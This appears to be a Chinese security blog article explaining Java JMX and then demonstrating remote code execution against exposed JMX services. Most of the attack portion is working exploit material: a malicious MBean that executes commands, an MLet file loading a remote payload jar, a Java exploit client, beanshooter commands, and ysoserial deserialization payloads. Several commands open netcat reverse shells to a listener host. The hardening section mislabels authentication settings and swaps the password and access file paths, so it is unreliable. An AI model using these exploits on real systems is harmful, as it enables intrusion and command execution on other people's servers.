JMX(Java Management Extensions,即Java管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架,JMX可以跨越一系列异构操作系统平台、系统体系结构和网络传输协议,灵活的开发无缝集成的系统、网络和服务管理应用,我们可以将JMX理解为一个服务器,它能让客户端远程访问该服务器上运行的JAVA程序的API并通过相应的函数对该程序进行增删改查,运维人员常部署Zabbix、Cacti和Nagios对Tomcat、Weblogic等服务器进行监控时通常都是通过JMX访问Tomcat、Weblogic的方式实现,然后通过JVM的queryMBeans方法查询获取具体的Mbean(Thread、JVM、JDBC),根据Bean的属性值判断运行状态,本篇文章我们注意介绍JMX的相关基础知识以及风险点和攻击方式
JMX架构如下所示:
从图中我们可以看到JMX的结构一共分为三层:
a、基础层:主要是MBean,被管理的资源
b、适配层:MBeanServer,主要是提供对资源的注册和管理 c、接入层:Connector,提供远程访问的入口
文件结构:
├──HelloWorld.java├──HelloWorldMBean.java└──jmxDemo.java
代码实现: HelloWorldMBean.java
packagecom.jmx;publicinterfaceHelloWorldMBean{publicvoidsayhello();publicintadd(intx,inty);publicStringgetName();}
HelloWorld.java
packagecom.jmx;publicclassHelloWorldimplementsHelloWorldMBean{privateStringname="Al1ex";@Overridepublicvoidsayhello(){System.out.println("hello world "+this.name);}@Overridepublicintadd(intx,inty){returnx+y;}@OverridepublicStringgetName(){returnthis.name;}}
jmxDemo.java
packagecom.jmx;importjava.lang.management.ManagementFactory;importjavax.management.MBeanServer;importjavax.management.ObjectName;importjava.rmi.registry.LocateRegistry;importjava.rmi.registry.Registry;importjavax.management.remote.JMXServiceURL;importjavax.management.remote.JMXConnectorServer;importjavax.management.remote.JMXConnectorServerFactory;publicclassjmxDemo{publicstaticvoidmain(String[]args)throwsException{MBeanServermbs=ManagementFactory.getPlatformMBeanServer();ObjectNamembsname=newObjectName("test:type=HelloWorld");HelloWorldmbean=newHelloWorld();mbs.registerMBean(mbean,mbsname);Registryregistry=LocateRegistry.createRegistry(1099);JMXServiceURLjmxServiceURL=newJMXServiceURL("service:jmx:rmi:///jndi/rmi://localhost:1099/jmxrmi");JMXConnectorServerjmxConnectorServer=JMXConnectorServerFactory.newJMXConnectorServer(jmxServiceURL,null,mbs);jmxConnectorServer.start();System.out.println("JMXConnectorServer is ready...");System.out.println("press any key to exit.");System.in.read();}}
上述代码中的相关层级说明:
执行jmxDemo.java程序:
启动jconsol进行连接:
随后调用sayHello:
JMX提供了一种机制可以使用远程MBean,在实现时我们可以通过MLet对象来实现,该对象有一个getMBeansFromURL方法,通过该方法我们可以使用远程的MBean,也正是因为这个原因才导致JMX存在远程代码执行漏洞的可能,在代码审计过程中我们有可能会碰到一个对外开放JMX的系统,此时我们可以通过代码使其加载远程的恶意EvilMBean从而实现执行任意代码,例如:Apache Solr的8.1.1和8.2.0 linux版本,下面简单实践一下看看:
Step 1:编写一个EvilMBean接口
publicinterfaceEvilMBean{publicStringrunCommand(Stringcmd);}
Step 2:编写EvilMBean的实现
importjava.io.*;publicclassEvilimplementsEvilMBean{@OverridepublicStringrunCommand(Stringcmd){try{Runtimert=Runtime.getRuntime();Processproc=rt.exec(cmd);BufferedReaderstdInput=newBufferedReader(newInputStreamReader(proc.getInputStream()));BufferedReaderstdError=newBufferedReader(newInputStreamReader(proc.getErrorStream()));Stringstdout_err_data="";Strings;while((s=stdInput.readLine())!=null){stdout_err_data+=s+"\n";}while((s=stdError.readLine())!=null){stdout_err_data+=s+"\n";}proc.waitFor();returnstdout_err_data;}catch(Exceptione){returne.toString();}}}
随后将上述两个java程序编译后打包成jar包:
javacEvil.javaEvilMBean.javajar-cvfJMXPayload.jarEvil.classEvilMBean.class
JMXPayload.jar文件内容如下所示:
Step 3:再创建一个名为mlet的文件,该文件是给getMBeansFromURL函数使用的,通过该文件getMBeansFromURL会到远程下载JMXPayload.jar文件,内容如下:
<HTML><mletcode="Evil"archive="JMXPayload.jar"name="MLetCompromise1:name=Evil,id=10"codebase="http://127.0.0.1:4141"></mlet></HTML>
参数说明:
Step 4:随后将JMXPayload.jar和mlet放在网站同一目录下并启动一个简易的Web服务器
python2-mSimpleHTTPServer4141
Step 5:启动JMXServer作为服务端
importjavax.management.MBeanServer;importjavax.management.remote.JMXConnectorServer;importjavax.management.remote.JMXConnectorServerFactory;importjavax.management.remote.JMXServiceURL;importjava.io.IOException;importjava.lang.management.ManagementFactory;importjava.net.MalformedURLException;importjava.rmi.registry.LocateRegistry;publicclassJMXServer{publicstaticvoidmain(String[]args)throwsException{MBeanServermbs=ManagementFactory.getPlatformMBeanServer();try{LocateRegistry.createRegistry(9999);JMXServiceURLurl=newJMXServiceURL("service:jmx:rmi:///jndi/rmi://127.0.0.1:9999/jmxrmi");JMXConnectorServercs=JMXConnectorServerFactory.newJMXConnectorServer(url,null,mbs);System.out.println("....................begin rmi start.....");cs.start();System.out.println("....................rmi start.....");}catch(MalformedURLExceptione){e.printStackTrace();}catch(IOExceptione){e.printStackTrace();}}}
Step 6:构建ExploitJMXByRemoteMBean并启动
packageJMX_Remote;importjavax.management.MBeanServerConnection;importjavax.management.ObjectInstance;importjavax.management.ObjectName;importjavax.management.remote.JMXConnector;importjavax.management.remote.JMXConnectorFactory;importjavax.management.remote.JMXServiceURL;importjava.net.InetAddress;importjava.net.MalformedURLException;importjava.util.HashSet;importjava.util.Iterator;publicclassExploitJMXByRemoteMBean{publicstaticvoidmain(String[]args){try{// connectAndOwn(args[0], args[1], args[2]);connectAndOwn("localhost","9999","hostname");}catch(Exceptione){e.printStackTrace();}}staticvoidconnectAndOwn(StringserverName,Stringport,Stringcommand)throwsMalformedURLException{try{// step1. 通过rmi创建 jmx连接JMXServiceURLu=newJMXServiceURL("service:jmx:rmi:///jndi/rmi://"+serverName+":"+port+"/jmxrmi");System.out.println("URL: "+u+", connecting");JMXConnectorc=JMXConnectorFactory.connect(u);System.out.println("Connected: "+c.getConnectionId());MBeanServerConnectionm=c.getMBeanServerConnection();// step2. 加载特殊MBean:javax.management.loading.MLetObjectInstanceevil_bean=null;ObjectInstanceevil=null;try{evil=m.createMBean("javax.management.loading.MLet",null);}catch(javax.management.InstanceAlreadyExistsExceptione){evil=m.getObjectInstance(newObjectName("DefaultDomain:type=MLet"));}// step3:通过MLet加载远程恶意MBeanSystem.out.println("Loaded "+evil.getClassName());Objectres=m.invoke(evil.getObjectName(),"getMBeansFromURL",newObject[]{String.format("http://%s:4141/mlet",InetAddress.getLocalHost().getHostAddress())},newString[]{String.class.getName()});HashSetres_set=((HashSet)res);Iteratoritr=res_set.iterator();ObjectnextObject=itr.next();if(nextObjectinstanceofException){throw((Exception)nextObject);}evil_bean=((ObjectInstance)nextObject);// step4: 执行恶意MBeanSystem.out.println("Loaded class: "+evil_bean.getClassName()+" object "+evil_bean.getObjectName());System.out.println("Calling runCommand with: "+command);Objectresult=m.invoke(evil_bean.getObjectName(),"runCommand",newObject[]{command},newString[]{String.class.getName()});System.out.println("Result: "+result);}catch(Exceptione){e.printStackTrace();}}}
同时在web服务端也成功留下请求记录信息:
随后使用Jconsole连接查看添加的MBean:
再次确认已成功注册恶意MBean:
尝试执行命令:
此时我们也可以通过编写客户端来实现对已注册的MBean的方法调用:
packageJMX_Remote;importjava.io.IOException;importjavax.management.MBeanServerConnection;importjavax.management.ObjectName;importjavax.management.remote.JMXConnector;importjavax.management.remote.JMXConnectorFactory;importjavax.management.remote.JMXServiceURL;publicclassClient{publicstaticvoidmain(String[]args)throwsIOException,Exception,NullPointerException{JMXServiceURLurl=newJMXServiceURL("service:jmx:rmi:///jndi/rmi://localhost:9999/jmxrmi");JMXConnectorjmxc=JMXConnectorFactory.connect(url,null);MBeanServerConnectionmbsc=jmxc.getMBeanServerConnection();ObjectNamembeanName=newObjectName("MLetCompromise1:name=Evil,id=10");System.out.println("MBean count = "+mbsc.getMBeanCount());mbsc.invoke(mbeanName,"runCommand",newObject[]{"calc.exe"},newString[]{String.class.getName()});}}
使用工具向JMX服务端注册恶意MBean: Step 1:编写一个EvilMBean接口
publicinterfaceEvilMBean{publicStringrunCommand(Stringcmd);}
Step 2:编写EvilMBean的实现
importjava.io.*;publicclassEvilimplementsEvilMBean{@OverridepublicStringrunCommand(Stringcmd){try{Runtimert=Runtime.getRuntime();Processproc=rt.exec(cmd);BufferedReaderstdInput=newBufferedReader(newInputStreamReader(proc.getInputStream()));BufferedReaderstdError=newBufferedReader(newInputStreamReader(proc.getErrorStream()));Stringstdout_err_data="";Strings;while((s=stdInput.readLine())!=null){stdout_err_data+=s+"\n";}while((s=stdError.readLine())!=null){stdout_err_data+=s+"\n";}proc.waitFor();returnstdout_err_data;}catch(Exceptione){returne.toString();}}}
随后将上述两个java程序编译后打包成jar包:
javacEvil.javaEvilMBean.javajar-cvfJMXPayload.jarEvil.classEvilMBean.class
JMXPayload.jar文件内容如下所示
Step 4:随后使用python来启动一个简单的HTTP服务托管JMXPayload.jar
python2-mSimpleHTTPServer4141
Step 5:使用beanshooter来部署jar
java-jarbeanshooter.jardeploy10.1.200.19999Evilcom.al1ex:type=Example--jar-fileJMXPayload.jar--stager-urlhttp://10.1.200.1:4141
部署效果如下所示,随后直接远程链接并执行命令即可
Step 1:使用mlet加载tonka MBeans
java-jarbeanshooter.jarmletload172.17.0.29010tonkahttp://172.17.0.1:8000
Step 2:借助tonka来执行命令
java-jarbeanshooter.jartonkaexec172.17.0.29010id
最后我们要对加载的恶意的MBean做一个清理处理(根据上面的Object名称来传参)
java-jarbeanshooter.jarundeploy172.17.0.29010MLetTonkaBean:name=TonkaBean,id=1
借助standard模块操作来反弹shell:
java-jarbeanshooter.jarstandard172.17.0.29010exec'nc172.17.0.14444-eash'
Step 1:开启监听
nc-lnvp1234
Step 2:发起反序列化请求,如果出现下面的错误提示则说明是未配置yso.jar的路径
java-jarbeanshooter.jarserial172.17.0.21090CommonsCollections6"nc 172.17.0.1 1234 -e ash"--usernameadmin--passwordadmin
随后正常执行后可以成功反弹shell回来:
JMX服务也容易受到预先验证的反序列化攻击,要滥用这一点,您可以使用-preauth开关,而这个利用其实是RMI-JRMP的实现:
java-jarbeanshooter.jarserial172.17.0.21090CommonsCollections6"nc 172.17.0.1 4444 -e ash"--preauth
如果开启认证则上面的几种攻击方式是不能打的(未知账户/密码的情况下): https://github.com/openjdk-mirror/jdk7u-jdk/blob/f4d80957e89a19a29bb9f9807d2a28351ed7f7df/src/share/classes/com/sun/jmx/remote/security/MBeanServerAccessController.java#L619
ysoserial在2019年5月份的时候添加了一个新的模块,通过它可以来打认证后的MBean服务 https://github.com/frohoff/ysoserial/commit/55f1e7c35cabb454385fca14be03b80129cfa62e
实现原理就是调用一个MBean方法,该方法接受String(或任何其他类)作为参数,如果将String类型的参数替换为gadget,ysoserial工具实现就是将默认Mbean中java.util.logging:type=Logging中的getLoggerLevel参数进行替换,当然服务器上必须存在有gadget的jar包,我这里测试的用的是CommonsBeanutils1:
"C:\Program Files\Java\jdk1.8.0_102\bin\java.exe"-cpysoserial.jarysoserial.exploit.JMXInvokeMBean127.0.0.19999CommonsBeanutils1calc.exe
通过代码实现(需要导入ysoserial.jar包):
packageJMX_Remote;importjavax.management.MBeanServerConnection;importjavax.management.ObjectName;importjavax.management.remote.*;importysoserial.payloads.ObjectPayload.Utils;publicclassjmxInvoke{publicstaticvoidmain(String[]args)throwsException{JMXServiceURLurl=newJMXServiceURL("service:jmx:rmi:///jndi/rmi://192.168.174.153:9999/jmxrmi");JMXConnectorjmxConnector=JMXConnectorFactory.connect(url);MBeanServerConnectionmbeanServerConnection=jmxConnector.getMBeanServerConnection();ObjectNamembeanName=newObjectName("java.util.logging:type=Logging");Objectpayloadobject=Utils.makePayloadObject("Jdk7u21","calc.exe");mbeanServerConnection.invoke(mbeanName,"getLoggerLevel",newObject[]{payloadobject},newString[]{String.class.getCanonicalName()});}}
执行结果如下所示:
(1) 结合业务进行安全考虑,如果不需要JMX服务可以关闭 (2) 如果需要开启则建议启用认证,同时妥善保管认证信息: a、首先创建一个jmxremote.access文件,用于定义哪些用户可以访问JMX服务
#格式示例用户名权限monitorRolereadonlycontrolRolereadwrite#简易示例monitorRolereadonlycontrolRolereadwrite
b、创建一个jmxremote.password文件用于定义用户密码
#文件格式用户名密码#简易示例monitorRolepassword123controlRolepassword456
c、配置JMX Agent以使用上述文件
#格式说明-Dcom.sun.management.jmxremote.port=9999#指定端口-Dcom.sun.management.jmxremote.authenticate=true#指定不需要用户名与密码-Dcom.sun.management.jmxremote.ssl=false#不采用HTTPS连接-Dcom.sun.management.jmxremote.password.file=/path/to/jmxremote.access#密码文件-Dcom.sun.management.jmxremote.access.file=/path/to/jmxremote.password#权限文件#简易示例-Dcom.sun.management.jmxremote.port=9999-Dcom.sun.management.jmxremote.authenticate=true-Dcom.sun.management.jmxremote.ssl=false-Dcom.sun.management.jmxremote.password.file=jmxremote.access-Dcom.sun.management.jmxremote.access.file=jmxremote.password
d、运行应用后使用jsconsole进行访问可以看到需要身份认证
从上文中我们可以看到JMX的安全问题主要可以归结为以下几类:
https://www.sohu.com/a/385420581_354899 https://www.optiv.com/blog/exploiting-jmx-rmi https://blog.csdn.net/CTZL123456/article/details/140552533 https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/ https://docs.oracle.com/javase/7/docs/api/javax/management/ObjectName.html
推 荐 阅 读
横向移动之RDP&Desktop Session Hija